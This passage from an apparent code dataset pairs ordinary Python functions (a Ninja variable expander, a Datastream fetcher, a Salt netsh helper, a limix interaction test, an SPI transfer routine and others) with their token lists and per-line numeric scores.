"]",
"+",
"[",
"(",
"ran",
"[",
"-",
"1",
"]",
"[",
"0",
"]",
",",
"hi",
")",
"]"
] | 39.791667 | [
0.030303030303030304,
0.03773584905660377,
0,
0.046153846153846156,
0.04285714285714286,
0.031746031746031744,
0,
0.02857142857142857,
0.06451612903225806,
0.18181818181818182,
0.06060606060606061,
0.1111111111111111,
0.08333333333333333,
0.05555555555555555,
0.07894736842105263,
0.06349206349206349,
0.0821917808219178,
0.061224489795918366,
0.05660377358490566,
0.08571428571428572,
0.08,
0.06896551724137931,
0.15384615384615385,
0.02857142857142857
] |
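An illustrative trace of the refinement loop above (hypothetical input, assuming `t.search_one(kw).arg` yields the strings shown): if the chain carries the range arguments "1..10" and then "2..5 | 7..max", the loop runs twice:

    # pass 1: ran = [['1', '10']]               -> lo = '1', hi = '10'
    # pass 2: ran = [['2', '5'], ['7', 'max']]  -> lo = '2', hi stays '10'
    # result: [('2', '5'), ('7', '10')]

so the outer bounds inherited from the base type cap the refined segments.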
def expand(string, vars, local_vars={}):
    """Expand a string containing $vars as Ninja would.

    Note: doesn't handle the full Ninja variable syntax, but it's enough
    to make configure.py's use of it work.
    """
    def exp(m):
        var = m.group(1)
        if var == '$':
            return '$'
        return local_vars.get(var, vars.get(var, ''))
    return re.sub(r'\$(\$|\w*)', exp, string)
"def",
"expand",
"(",
"string",
",",
"vars",
",",
"local_vars",
"=",
"{",
"}",
")",
":",
"def",
"exp",
"(",
"m",
")",
":",
"var",
"=",
"m",
".",
"group",
"(",
"1",
")",
"if",
"var",
"==",
"'$'",
":",
"return",
"'$'",
"return",
"local_vars",
".",
"get",
"(",
"var",
",",
"vars",
".",
"get",
"(",
"var",
",",
"''",
")",
")",
"return",
"re",
".",
"sub",
"(",
"r'\\$(\\$|\\w*)'",
",",
"exp",
",",
"string",
")"
] | 33.083333 | [
0.025,
0.03636363636363636,
0,
0.027777777777777776,
0.047619047619047616,
0.2857142857142857,
0.13333333333333333,
0.08333333333333333,
0.09090909090909091,
0.09090909090909091,
0.03773584905660377,
0.044444444444444446
] |
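Two illustrative calls of the expansion helper above (variable names and values are hypothetical):

    expand('$out/$name.o', {'out': 'build', 'name': 'global'}, {'name': 'foo'})
    # -> 'build/foo.o'  (local_vars takes precedence over vars)
    expand('cost: $$5', {})
    # -> 'cost: $5'     ('$$' escapes a literal dollar sign)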
def fetch(self, tickers, fields=None, date=None, date_from=None, date_to=None,
          freq='D', only_data=True, static=False):
    """Fetch data from TR DWE.

    tickers   - ticker or list of tickers
    fields    - list of fields.
    date      - date for a single-date query
    date_from, date_to - date range (used only if "date" is not specified)
    freq      - frequency of data: daily('D'), weekly('W') or monthly('M')
    only_data - if True then metadata will not be returned
    static    - if True a "static" request is created (i.e. not a series).
                In this case 'date_from', 'date_to' and 'freq' are ignored

    If a list of tickers is requested, a MultiIndex-dataframe is returned.

    Some of the available fields:
    P    - adjusted closing price
    PO   - opening price
    PH   - high price
    PL   - low price
    VO   - volume, which is expressed in 1000's of shares.
    UP   - unadjusted price
    OI   - open interest
    MV   - market value
    EPS  - earnings per share
    DI   - dividend index
    MTVB - market to book value
    PTVB - price to book value
    ...

    The full list of data fields is available at http://dtg.tfn.com/.
    """
    if static:
        query = self.construct_request(tickers, fields, date, freq='REP')
    else:
        query = self.construct_request(tickers, fields, date, date_from, date_to, freq)
    raw = self.request(query)

    if static:
        data, metadata = self.parse_record_static(raw)
    elif isinstance(tickers, basestring) or len(tickers) == 1:
        data, metadata = self.parse_record(raw)
    elif hasattr(tickers, '__len__'):
        metadata = pd.DataFrame()
        data = {}
        for indx in range(len(tickers)):
            dat, meta = self.parse_record(raw, indx)
            data[tickers[indx]] = dat
            metadata = metadata.append(meta, ignore_index=False)
        data = pd.concat(data)
    else:
        raise DatastreamException(('First argument should be either ticker or '
                                   'list of tickers'))

    if only_data:
        return data
    else:
        return data, metadata
"def",
"fetch",
"(",
"self",
",",
"tickers",
",",
"fields",
"=",
"None",
",",
"date",
"=",
"None",
",",
"date_from",
"=",
"None",
",",
"date_to",
"=",
"None",
",",
"freq",
"=",
"'D'",
",",
"only_data",
"=",
"True",
",",
"static",
"=",
"False",
")",
":",
"if",
"static",
":",
"query",
"=",
"self",
".",
"construct_request",
"(",
"tickers",
",",
"fields",
",",
"date",
",",
"freq",
"=",
"'REP'",
")",
"else",
":",
"query",
"=",
"self",
".",
"construct_request",
"(",
"tickers",
",",
"fields",
",",
"date",
",",
"date_from",
",",
"date_to",
",",
"freq",
")",
"raw",
"=",
"self",
".",
"request",
"(",
"query",
")",
"if",
"static",
":",
"data",
",",
"metadata",
"=",
"self",
".",
"parse_record_static",
"(",
"raw",
")",
"elif",
"isinstance",
"(",
"tickers",
",",
"basestring",
")",
"or",
"len",
"(",
"tickers",
")",
"==",
"1",
":",
"data",
",",
"metadata",
"=",
"self",
".",
"parse_record",
"(",
"raw",
")",
"elif",
"hasattr",
"(",
"tickers",
",",
"'__len__'",
")",
":",
"metadata",
"=",
"pd",
".",
"DataFrame",
"(",
")",
"data",
"=",
"{",
"}",
"for",
"indx",
"in",
"range",
"(",
"len",
"(",
"tickers",
")",
")",
":",
"dat",
",",
"meta",
"=",
"self",
".",
"parse_record",
"(",
"raw",
",",
"indx",
")",
"data",
"[",
"tickers",
"[",
"indx",
"]",
"]",
"=",
"dat",
"metadata",
"=",
"metadata",
".",
"append",
"(",
"meta",
",",
"ignore_index",
"=",
"False",
")",
"data",
"=",
"pd",
".",
"concat",
"(",
"data",
")",
"else",
":",
"raise",
"DatastreamException",
"(",
"(",
"'First argument should be either ticker or '",
"'list of tickers'",
")",
")",
"if",
"only_data",
":",
"return",
"data",
"else",
":",
"return",
"data",
",",
"metadata"
] | 38.032787 | [
0.02564102564102564,
0.12962962962962962,
0.058823529411764705,
0,
0.06521739130434782,
0.1111111111111111,
0.08163265306122448,
0.06172839506172839,
0.05063291139240506,
0.046153846153846156,
0.06493506493506493,
0.0379746835443038,
0,
0.047619047619047616,
0,
0.08333333333333333,
0.10526315789473684,
0.10344827586206896,
0.11538461538461539,
0.12,
0.047619047619047616,
0.09375,
0.10344827586206896,
0,
0.10714285714285714,
0.08571428571428572,
0.1,
0.07894736842105263,
0.08108108108108109,
0.21428571428571427,
0,
0.05263157894736842,
0.18181818181818182,
0.1111111111111111,
0.025974025974025976,
0.15384615384615385,
0.03296703296703297,
0,
0.06060606060606061,
0,
0.1111111111111111,
0.034482758620689655,
0.030303030303030304,
0.0392156862745098,
0.04878048780487805,
0.05405405405405406,
0.09523809523809523,
0.045454545454545456,
0.03571428571428571,
0.04878048780487805,
0.029411764705882353,
0,
0.058823529411764705,
0.15384615384615385,
0.04819277108433735,
0.06896551724137931,
0,
0.09523809523809523,
0.08695652173913043,
0.15384615384615385,
0.06060606060606061
] |
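A hedged usage sketch of the fetch method above (the instance name `dwe`, the ticker mnemonics and the dates are illustrative only, not confirmed Datastream codes):

    df = dwe.fetch(['@AAPL', 'U:MMM'], fields=['P', 'VO'],
                   date_from='2020-01-01', date_to='2020-12-31', freq='D')
    # a list of tickers yields a MultiIndex DataFrame keyed by ticker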
def _netsh_file(content):
    '''
    helper function to get the results of ``netsh -f content.txt``

    Running ``netsh`` will drop you into a ``netsh`` prompt where you can issue
    ``netsh`` commands. You can put a series of commands in an external file and
    run them as if from a ``netsh`` prompt using the ``-f`` switch. That's what
    this function does.

    Args:
        content (str):
            The contents of the file that will be run by the ``netsh -f``
            command

    Returns:
        str: The text returned by the netsh command
    '''
    with tempfile.NamedTemporaryFile(mode='w',
                                     prefix='salt-',
                                     suffix='.netsh',
                                     delete=False) as fp:
        fp.write(content)
    try:
        log.debug('%s:\n%s', fp.name, content)
        return salt.modules.cmdmod.run('netsh -f {0}'.format(fp.name), python_shell=True)
    finally:
        os.remove(fp.name)
"def",
"_netsh_file",
"(",
"content",
")",
":",
"with",
"tempfile",
".",
"NamedTemporaryFile",
"(",
"mode",
"=",
"'w'",
",",
"prefix",
"=",
"'salt-'",
",",
"suffix",
"=",
"'.netsh'",
",",
"delete",
"=",
"False",
")",
"as",
"fp",
":",
"fp",
".",
"write",
"(",
"content",
")",
"try",
":",
"log",
".",
"debug",
"(",
"'%s:\\n%s'",
",",
"fp",
".",
"name",
",",
"content",
")",
"return",
"salt",
".",
"modules",
".",
"cmdmod",
".",
"run",
"(",
"'netsh -f {0}'",
".",
"format",
"(",
"fp",
".",
"name",
")",
",",
"python_shell",
"=",
"True",
")",
"finally",
":",
"os",
".",
"remove",
"(",
"fp",
".",
"name",
")"
] | 34.5 | [
0.04,
0.2857142857142857,
0.06060606060606061,
0,
0.0379746835443038,
0.05,
0.05063291139240506,
0.08695652173913043,
0,
0.2222222222222222,
0,
0.13636363636363635,
0.0547945205479452,
0.10526315789473684,
0,
0.16666666666666666,
0.0392156862745098,
0.2857142857142857,
0.06521739130434782,
0.07692307692307693,
0.07547169811320754,
0.08771929824561403,
0.08,
0.25,
0.043478260869565216,
0.033707865168539325,
0.16666666666666666,
0.07692307692307693
] |
def simple_interaction_kronecker(snps, phenos, covs=None, Acovs=None, Asnps1=None, Asnps0=None, K1r=None, K1c=None, K2r=None, K2c=None, covar_type='lowrank_diag', rank=1, NumIntervalsDelta0=100, NumIntervalsDeltaAlt=0, searchDelta=False):
    """
    I-variate fixed effects interaction test for phenotype-specific SNP effects

    Args:
        snps:   [N x S] SP.array of S SNPs for N individuals (test SNPs)
        phenos: [N x P] SP.array of P phenotypes for N individuals
        covs:   list of SP.arrays holding covariates. Each covs[i] has one corresponding Acovs[i]
        Acovs:  list of SP.arrays holding the phenotype design matrices for covariates.
                Each covs[i] has one corresponding Acovs[i].
        Asnps1: list of SP.arrays of I interaction variables to be tested for N
                individuals. Note that it is assumed that Asnps0 is already included.
                If not provided, the alternative model will be the independent model
        Asnps0: single SP.array of I0 interaction variables to be included in the
                background model when testing for interaction with Inters
        K1r:    [N x N] SP.array of LMM-covariance/kinship coefficients (optional)
                If not provided, then linear regression analysis is performed
        K1c:    [P x P] SP.array of LMM-covariance/kinship coefficients (optional)
                If not provided, then linear regression analysis is performed
        K2r:    [N x N] SP.array of LMM-covariance/kinship coefficients (optional)
                If not provided, then linear regression analysis is performed
        K2c:    [P x P] SP.array of LMM-covariance/kinship coefficients (optional)
                If not provided, then linear regression analysis is performed
        covar_type: type of covariance to use. Default 'freeform'. Possible values are
                'freeform':     free form optimization,
                'fixed':        use a fixed matrix specified in covar_K0,
                'diag':         optimize a diagonal matrix,
                'lowrank':      optimize a low rank matrix. The rank of the lowrank part is specified in the variable rank,
                'lowrank_id':   optimize a low rank matrix plus the weight of a constant diagonal matrix. The rank of the lowrank part is specified in the variable rank,
                'lowrank_diag': optimize a low rank matrix plus a free diagonal matrix. The rank of the lowrank part is specified in the variable rank,
                'block':        optimize the weight of a constant P x P block matrix of ones,
                'block_id':     optimize the weight of a constant P x P block matrix of ones plus the weight of a constant diagonal matrix,
                'block_diag':   optimize the weight of a constant P x P block matrix of ones plus a free diagonal matrix,
        rank:   rank of a possible lowrank component (default 1)
        NumIntervalsDelta0:   number of steps for delta optimization on the null model (100)
        NumIntervalsDeltaAlt: number of steps for delta optimization on the alt. model (0 - no optimization)
        searchDelta: Carry out delta optimization on the alternative model? If yes, we use NumIntervalsDeltaAlt steps

    Returns:
        pv:    P-values of the interaction test
        pv0:   P-values of the null model
        pvAlt: P-values of the alternative model
    """
    S = snps.shape[1]
    # 0. checks
    N = phenos.shape[0]
    P = phenos.shape[1]

    if K1r is None:
        K1r = SP.dot(snps, snps.T)
    else:
        assert K1r.shape[0] == N, 'K1r: dimensions mismatch'
        assert K1r.shape[1] == N, 'K1r: dimensions mismatch'
    if K2r is None:
        K2r = SP.eye(N)
    else:
        assert K2r.shape[0] == N, 'K2r: dimensions mismatch'
        assert K2r.shape[1] == N, 'K2r: dimensions mismatch'

    covs, Acovs = updateKronCovs(covs, Acovs, N, P)

    # Asnps can be several designs
    if Asnps0 is None:
        Asnps0 = [SP.ones([1, P])]
    if Asnps1 is None:
        Asnps1 = [SP.eye([P])]
    if type(Asnps0) != list:
        Asnps0 = [Asnps0]
    if type(Asnps1) != list:
        Asnps1 = [Asnps1]
    assert (len(Asnps0) == 1) and (len(Asnps1) > 0), "need at least one Snp design matrix for null and alt model"

    # one row per column design matrix
    pv = SP.zeros((len(Asnps1), snps.shape[1]))
    lrt = SP.zeros((len(Asnps1), snps.shape[1]))
    pvAlt = SP.zeros((len(Asnps1), snps.shape[1]))
    lrtAlt = SP.zeros((len(Asnps1), snps.shape[1]))

    # 1. run GP model to infer suitable covariance structure
    if K1c is None or K2c is None:
        vc = estimateKronCovariances(phenos=phenos, K1r=K1r, K2r=K2r, K1c=K1c, K2c=K2c, covs=covs, Acovs=Acovs, covar_type=covar_type, rank=rank)
        K1c = vc.getEstTraitCovar(0)
        K2c = vc.getEstTraitCovar(1)
    else:
        assert K1c.shape[0] == P, 'K1c: dimensions mismatch'
        assert K1c.shape[1] == P, 'K1c: dimensions mismatch'
        assert K2c.shape[0] == P, 'K2c: dimensions mismatch'
        assert K2c.shape[1] == P, 'K2c: dimensions mismatch'

    # 2. run kroneckerLMM for null model
    lmm = limix.CKroneckerLMM()
    lmm.setK1r(K1r)
    lmm.setK1c(K1c)
    lmm.setK2r(K2r)
    lmm.setK2c(K2c)
    lmm.setSNPs(snps)
    # add covariates
    for ic in range(len(Acovs)):
        lmm.addCovariates(covs[ic], Acovs[ic])
    lmm.setPheno(phenos)

    # delta search on alt. model?
    if searchDelta:
        lmm.setNumIntervalsAlt(NumIntervalsDeltaAlt)
        lmm.setNumIntervals0_inter(NumIntervalsDeltaAlt)
    else:
        lmm.setNumIntervalsAlt(0)
        lmm.setNumIntervals0_inter(0)
    lmm.setNumIntervals0(NumIntervalsDelta0)

    # add SNP design
    lmm.setSNPcoldesign0_inter(Asnps0[0])
    for iA in range(len(Asnps1)):
        lmm.setSNPcoldesign(Asnps1[iA])
        lmm.process()
        pvAlt[iA, :] = lmm.getPv()[0]
        pv[iA, :] = lmm.getPv()[1]
    pv0 = lmm.getPv()[2]
    return pv, pv0, pvAlt
"def",
"simple_interaction_kronecker",
"(",
"snps",
",",
"phenos",
",",
"covs",
"=",
"None",
",",
"Acovs",
"=",
"None",
",",
"Asnps1",
"=",
"None",
",",
"Asnps0",
"=",
"None",
",",
"K1r",
"=",
"None",
",",
"K1c",
"=",
"None",
",",
"K2r",
"=",
"None",
",",
"K2c",
"=",
"None",
",",
"covar_type",
"=",
"'lowrank_diag'",
",",
"rank",
"=",
"1",
",",
"NumIntervalsDelta0",
"=",
"100",
",",
"NumIntervalsDeltaAlt",
"=",
"0",
",",
"searchDelta",
"=",
"False",
")",
":",
"S",
"=",
"snps",
".",
"shape",
"[",
"1",
"]",
"#0. checks",
"N",
"=",
"phenos",
".",
"shape",
"[",
"0",
"]",
"P",
"=",
"phenos",
".",
"shape",
"[",
"1",
"]",
"if",
"K1r",
"==",
"None",
":",
"K1r",
"=",
"SP",
".",
"dot",
"(",
"snps",
",",
"snps",
".",
"T",
")",
"else",
":",
"assert",
"K1r",
".",
"shape",
"[",
"0",
"]",
"==",
"N",
",",
"'K1r: dimensions dismatch'",
"assert",
"K1r",
".",
"shape",
"[",
"1",
"]",
"==",
"N",
",",
"'K1r: dimensions dismatch'",
"if",
"K2r",
"==",
"None",
":",
"K2r",
"=",
"SP",
".",
"eye",
"(",
"N",
")",
"else",
":",
"assert",
"K2r",
".",
"shape",
"[",
"0",
"]",
"==",
"N",
",",
"'K2r: dimensions dismatch'",
"assert",
"K2r",
".",
"shape",
"[",
"1",
"]",
"==",
"N",
",",
"'K2r: dimensions dismatch'",
"covs",
",",
"Acovs",
"=",
"updateKronCovs",
"(",
"covs",
",",
"Acovs",
",",
"N",
",",
"P",
")",
"#Asnps can be several designs",
"if",
"(",
"Asnps0",
"is",
"None",
")",
":",
"Asnps0",
"=",
"[",
"SP",
".",
"ones",
"(",
"[",
"1",
",",
"P",
"]",
")",
"]",
"if",
"Asnps1",
"is",
"None",
":",
"Asnps1",
"=",
"[",
"SP",
".",
"eye",
"(",
"[",
"P",
"]",
")",
"]",
"if",
"(",
"type",
"(",
"Asnps0",
")",
"!=",
"list",
")",
":",
"Asnps0",
"=",
"[",
"Asnps0",
"]",
"if",
"(",
"type",
"(",
"Asnps1",
")",
"!=",
"list",
")",
":",
"Asnps1",
"=",
"[",
"Asnps1",
"]",
"assert",
"(",
"len",
"(",
"Asnps0",
")",
"==",
"1",
")",
"and",
"(",
"len",
"(",
"Asnps1",
")",
">",
"0",
")",
",",
"\"need at least one Snp design matrix for null and alt model\"",
"#one row per column design matrix",
"pv",
"=",
"SP",
".",
"zeros",
"(",
"(",
"len",
"(",
"Asnps1",
")",
",",
"snps",
".",
"shape",
"[",
"1",
"]",
")",
")",
"lrt",
"=",
"SP",
".",
"zeros",
"(",
"(",
"len",
"(",
"Asnps1",
")",
",",
"snps",
".",
"shape",
"[",
"1",
"]",
")",
")",
"pvAlt",
"=",
"SP",
".",
"zeros",
"(",
"(",
"len",
"(",
"Asnps1",
")",
",",
"snps",
".",
"shape",
"[",
"1",
"]",
")",
")",
"lrtAlt",
"=",
"SP",
".",
"zeros",
"(",
"(",
"len",
"(",
"Asnps1",
")",
",",
"snps",
".",
"shape",
"[",
"1",
"]",
")",
")",
"#1. run GP model to infer suitable covariance structure",
"if",
"K1c",
"==",
"None",
"or",
"K2c",
"==",
"None",
":",
"vc",
"=",
"estimateKronCovariances",
"(",
"phenos",
"=",
"phenos",
",",
"K1r",
"=",
"K1r",
",",
"K2r",
"=",
"K2r",
",",
"K1c",
"=",
"K1c",
",",
"K2c",
"=",
"K2c",
",",
"covs",
"=",
"covs",
",",
"Acovs",
"=",
"Acovs",
",",
"covar_type",
"=",
"covar_type",
",",
"rank",
"=",
"rank",
")",
"K1c",
"=",
"vc",
".",
"getEstTraitCovar",
"(",
"0",
")",
"K2c",
"=",
"vc",
".",
"getEstTraitCovar",
"(",
"1",
")",
"else",
":",
"assert",
"K1c",
".",
"shape",
"[",
"0",
"]",
"==",
"P",
",",
"'K1c: dimensions dismatch'",
"assert",
"K1c",
".",
"shape",
"[",
"1",
"]",
"==",
"P",
",",
"'K1c: dimensions dismatch'",
"assert",
"K2c",
".",
"shape",
"[",
"0",
"]",
"==",
"P",
",",
"'K2c: dimensions dismatch'",
"assert",
"K2c",
".",
"shape",
"[",
"1",
"]",
"==",
"P",
",",
"'K2c: dimensions dismatch'",
"#2. run kroneckerLMM for null model",
"lmm",
"=",
"limix",
".",
"CKroneckerLMM",
"(",
")",
"lmm",
".",
"setK1r",
"(",
"K1r",
")",
"lmm",
".",
"setK1c",
"(",
"K1c",
")",
"lmm",
".",
"setK2r",
"(",
"K2r",
")",
"lmm",
".",
"setK2c",
"(",
"K2c",
")",
"lmm",
".",
"setSNPs",
"(",
"snps",
")",
"#add covariates",
"for",
"ic",
"in",
"range",
"(",
"len",
"(",
"Acovs",
")",
")",
":",
"lmm",
".",
"addCovariates",
"(",
"covs",
"[",
"ic",
"]",
",",
"Acovs",
"[",
"ic",
"]",
")",
"lmm",
".",
"setPheno",
"(",
"phenos",
")",
"#delta serch on alt. model?",
"if",
"searchDelta",
":",
"lmm",
".",
"setNumIntervalsAlt",
"(",
"NumIntervalsDeltaAlt",
")",
"lmm",
".",
"setNumIntervals0_inter",
"(",
"NumIntervalsDeltaAlt",
")",
"else",
":",
"lmm",
".",
"setNumIntervalsAlt",
"(",
"0",
")",
"lmm",
".",
"setNumIntervals0_inter",
"(",
"0",
")",
"lmm",
".",
"setNumIntervals0",
"(",
"NumIntervalsDelta0",
")",
"#add SNP design",
"lmm",
".",
"setSNPcoldesign0_inter",
"(",
"Asnps0",
"[",
"0",
"]",
")",
"for",
"iA",
"in",
"range",
"(",
"len",
"(",
"Asnps1",
")",
")",
":",
"lmm",
".",
"setSNPcoldesign",
"(",
"Asnps1",
"[",
"iA",
"]",
")",
"lmm",
".",
"process",
"(",
")",
"pvAlt",
"[",
"iA",
",",
":",
"]",
"=",
"lmm",
".",
"getPv",
"(",
")",
"[",
"0",
"]",
"pv",
"[",
"iA",
",",
":",
"]",
"=",
"lmm",
".",
"getPv",
"(",
")",
"[",
"1",
"]",
"pv0",
"=",
"lmm",
".",
"getPv",
"(",
")",
"[",
"2",
"]",
"return",
"pv",
",",
"pv0",
",",
"pvAlt"
] | 49.024793 | [
0.07142857142857142,
0.2857142857142857,
0.02531645569620253,
0,
0.2222222222222222,
0.041666666666666664,
0.030303030303030304,
0.02857142857142857,
0.031578947368421054,
0.029411764705882353,
0.034482758620689655,
0.03225806451612903,
0.03260869565217391,
0.033707865168539325,
0.037037037037037035,
0.04878048780487805,
0.03529411764705882,
0.04878048780487805,
0.03529411764705882,
0.04878048780487805,
0.03529411764705882,
0.04878048780487805,
0.03529411764705882,
0.03333333333333333,
0.03389830508474576,
0.02702702702702703,
0.03389830508474576,
0.023809523809523808,
0.017142857142857144,
0.018867924528301886,
0.031914893617021274,
0.02097902097902098,
0.023622047244094488,
0.041666666666666664,
0.04395604395604396,
0.04672897196261682,
0.025,
0.16666666666666666,
0.041666666666666664,
0.047619047619047616,
0.04081632653061224,
0.2857142857142857,
0.15789473684210525,
0.21428571428571427,
0.125,
0.125,
0,
0.23529411764705882,
0.09090909090909091,
0.2222222222222222,
0.05172413793103448,
0.05172413793103448,
0,
0.23529411764705882,
0.08695652173913043,
0.2222222222222222,
0.05172413793103448,
0.05172413793103448,
0,
0.1276595744680851,
0,
0.09090909090909091,
0.08333333333333333,
0.09090909090909091,
0.09090909090909091,
0.06666666666666667,
0.10714285714285714,
0.08,
0.10714285714285714,
0.08,
0.045871559633027525,
0,
0.08108108108108109,
0.06521739130434782,
0.06382978723404255,
0.061224489795918366,
0.06,
0,
0.05084745762711865,
0.2,
0.020689655172413793,
0.05555555555555555,
0.05555555555555555,
0.2222222222222222,
0.05172413793103448,
0.05172413793103448,
0.05172413793103448,
0.05172413793103448,
0,
0.07692307692307693,
0.06451612903225806,
0.10526315789473684,
0.10526315789473684,
0.10526315789473684,
0.10526315789473684,
0.09523809523809523,
0.15789473684210525,
0.09090909090909091,
0.06666666666666667,
0.08333333333333333,
0,
0.0967741935483871,
0.10526315789473684,
0.038461538461538464,
0.03571428571428571,
0.2222222222222222,
0.06060606060606061,
0.05405405405405406,
0,
0,
0.045454545454545456,
0.15789473684210525,
0.04878048780487805,
0.06060606060606061,
0.05128205128205128,
0.09523809523809523,
0,
0.08333333333333333,
0.09090909090909091,
0.07142857142857142,
0.17391304347826086
] |
def get_hints(code_list, k=10, hint_folder=HINT_FOLDER, current_tokens=None):
    """
    Fetch first k hints for given code_list
    """
    def hint_score(v, size):
        """
        The formula for hint score
        """
        return 1.0 - abs(v / (size + 1) - 0.5)

    if len(code_list) <= 1:
        return [], []
    if current_tokens is None:
        current_tokens = []
    size = min(len(code_list), MAX_HINT_SMAPLING_SIZE)
    sample = random.sample(code_list, size)
    hint_list = []
    capital_dict = {}
    for code in sample:
        path = gen_path(hint_folder, code)
        fp = os.path.join(path, code)
        try:
            with open(fp) as f:
                hints = set(f.read().strip().split('\n'))
                hint_list.extend([h.lower() for h in hints])
                capital_dict.update({hint.lower(): hint for hint in hints})
        except FileNotFoundError:
            logging.warning("FileNotFoundError: No such file: %r" % fp)
    document_freq = Counter(hint_list)
    score = [(capital_dict[k], hint_score(v, size))
             for k, v in document_freq.items() if k not in current_tokens]
    if len(score) == 0:
        return [], []
    score.sort(key=lambda x: x[1], reverse=True)
    hints, scores = tuple(list(zip(*score[:k])))
    return hints, scores
"def",
"get_hints",
"(",
"code_list",
",",
"k",
"=",
"10",
",",
"hint_folder",
"=",
"HINT_FOLDER",
",",
"current_tokens",
"=",
"None",
")",
":",
"def",
"hint_score",
"(",
"v",
",",
"size",
")",
":",
"\"\"\"\n The formula for hint score\n \"\"\"",
"return",
"1.0",
"-",
"abs",
"(",
"v",
"/",
"(",
"size",
"+",
"1",
")",
"-",
"0.5",
")",
"if",
"len",
"(",
"code_list",
")",
"<=",
"1",
":",
"return",
"[",
"]",
",",
"[",
"]",
"if",
"current_tokens",
"is",
"None",
":",
"current_tokens",
"=",
"[",
"]",
"size",
"=",
"min",
"(",
"len",
"(",
"code_list",
")",
",",
"MAX_HINT_SMAPLING_SIZE",
")",
"sample",
"=",
"random",
".",
"sample",
"(",
"code_list",
",",
"size",
")",
"hint_list",
"=",
"[",
"]",
"capital_dict",
"=",
"{",
"}",
"for",
"code",
"in",
"sample",
":",
"path",
"=",
"gen_path",
"(",
"hint_folder",
",",
"code",
")",
"fp",
"=",
"os",
".",
"path",
".",
"join",
"(",
"path",
",",
"code",
")",
"try",
":",
"with",
"open",
"(",
"fp",
")",
"as",
"f",
":",
"hints",
"=",
"set",
"(",
"f",
".",
"read",
"(",
")",
".",
"strip",
"(",
")",
".",
"split",
"(",
"'\\n'",
")",
")",
"hint_list",
".",
"extend",
"(",
"[",
"h",
".",
"lower",
"(",
")",
"for",
"h",
"in",
"hints",
"]",
")",
"capital_dict",
".",
"update",
"(",
"{",
"hint",
".",
"lower",
"(",
")",
":",
"hint",
"for",
"hint",
"in",
"hints",
"}",
")",
"except",
"FileNotFoundError",
":",
"logging",
".",
"warning",
"(",
"\"FileNotFoundError: No such file: %r\"",
"%",
"fp",
")",
"document_freq",
"=",
"Counter",
"(",
"hint_list",
")",
"score",
"=",
"[",
"(",
"capital_dict",
"[",
"k",
"]",
",",
"hint_score",
"(",
"v",
",",
"size",
")",
")",
"for",
"k",
",",
"v",
"in",
"document_freq",
".",
"items",
"(",
")",
"if",
"k",
"not",
"in",
"current_tokens",
"]",
"if",
"len",
"(",
"score",
")",
"==",
"0",
":",
"return",
"[",
"]",
",",
"[",
"]",
"score",
".",
"sort",
"(",
"key",
"=",
"lambda",
"x",
":",
"x",
"[",
"1",
"]",
",",
"reverse",
"=",
"True",
")",
"hints",
",",
"scores",
"=",
"tuple",
"(",
"list",
"(",
"zip",
"(",
"*",
"score",
"[",
":",
"k",
"]",
")",
")",
")",
"return",
"hints",
",",
"scores"
] | 31.9 | [
0.012987012987012988,
0.2857142857142857,
0.046511627906976744,
0.2857142857142857,
0,
0.07142857142857142,
0.18181818181818182,
0.058823529411764705,
0.18181818181818182,
0.043478260869565216,
0,
0.07407407407407407,
0.09523809523809523,
0,
0.06666666666666667,
0.07407407407407407,
0,
0.037037037037037035,
0.046511627906976744,
0.1111111111111111,
0.09523809523809523,
0,
0.08695652173913043,
0.047619047619047616,
0.05405405405405406,
0.16666666666666666,
0.06451612903225806,
0.03508771929824561,
0.03333333333333333,
0.02666666666666667,
0.06060606060606061,
0.041666666666666664,
0.05263157894736842,
0.05660377358490566,
0.05405405405405406,
0.08695652173913043,
0.09523809523809523,
0.041666666666666664,
0.041666666666666664,
0.08333333333333333
] |
def get_auth(self):
    """Returns auth response which has client token unless MFA is required"""
    auth_resp = get_with_retry(self.cerberus_url + '/v2/auth/user',
                               auth=(self.username, self.password),
                               headers=self.HEADERS)
    if auth_resp.status_code != 200:
        throw_if_bad_response(auth_resp)
    return auth_resp.json()
"def",
"get_auth",
"(",
"self",
")",
":",
"auth_resp",
"=",
"get_with_retry",
"(",
"self",
".",
"cerberus_url",
"+",
"'/v2/auth/user'",
",",
"auth",
"=",
"(",
"self",
".",
"username",
",",
"self",
".",
"password",
")",
",",
"headers",
"=",
"self",
".",
"HEADERS",
")",
"if",
"auth_resp",
".",
"status_code",
"!=",
"200",
":",
"throw_if_bad_response",
"(",
"auth_resp",
")",
"return",
"auth_resp",
".",
"json",
"(",
")"
] | 40.9 | [
0.05263157894736842,
0.037037037037037035,
0.04225352112676056,
0.057971014492753624,
0.09259259259259259,
0,
0.05,
0.045454545454545456,
0,
0.06451612903225806
] |
def store_job_output(self, credentials, job_details, vm_instance_name):
    """
    Store the output of a finished job.
    :param credentials: jobapi.Credentials: user's credentials used to upload resulting files
    :param job_details: object: details about job(id, name, created date, workflow version)
    :param vm_instance_name: name of the instance lando_worker is running on (this is passed back in the response)
    """
    payload = StoreJobOutputPayload(credentials, job_details, vm_instance_name)
    self._send(JobCommands.STORE_JOB_OUTPUT, payload)
"def",
"store_job_output",
"(",
"self",
",",
"credentials",
",",
"job_details",
",",
"vm_instance_name",
")",
":",
"payload",
"=",
"StoreJobOutputPayload",
"(",
"credentials",
",",
"job_details",
",",
"vm_instance_name",
")",
"self",
".",
"_send",
"(",
"JobCommands",
".",
"STORE_JOB_OUTPUT",
",",
"payload",
")"
] | 64.777778 | [
0.014084507042253521,
0.18181818181818182,
0.046511627906976744,
0.041237113402061855,
0.042105263157894736,
0.043478260869565216,
0.18181818181818182,
0.03614457831325301,
0.03508771929824561
] |
def transfer(self, data):
    """Transfers data over SPI.

    Arguments:
        data: The data to transfer.

    Returns:
        The data returned by the SPI device.
    """
    settings = self.transfer_settings
    settings.spi_tx_size = len(data)
    self.transfer_settings = settings

    response = ''
    for i in range(0, len(data), 60):
        response += self.sendCommand(commands.SPITransferCommand(data[i:i + 60])).data
        time.sleep(0.01)
    while len(response) < len(data):
        response += self.sendCommand(commands.SPITransferCommand('')).data
    return ''.join(response)
"def",
"transfer",
"(",
"self",
",",
"data",
")",
":",
"settings",
"=",
"self",
".",
"transfer_settings",
"settings",
".",
"spi_tx_size",
"=",
"len",
"(",
"data",
")",
"self",
".",
"transfer_settings",
"=",
"settings",
"response",
"=",
"''",
"for",
"i",
"in",
"range",
"(",
"0",
",",
"len",
"(",
"data",
")",
",",
"60",
")",
":",
"response",
"+=",
"self",
".",
"sendCommand",
"(",
"commands",
".",
"SPITransferCommand",
"(",
"data",
"[",
"i",
":",
"i",
"+",
"60",
"]",
")",
")",
".",
"data",
"time",
".",
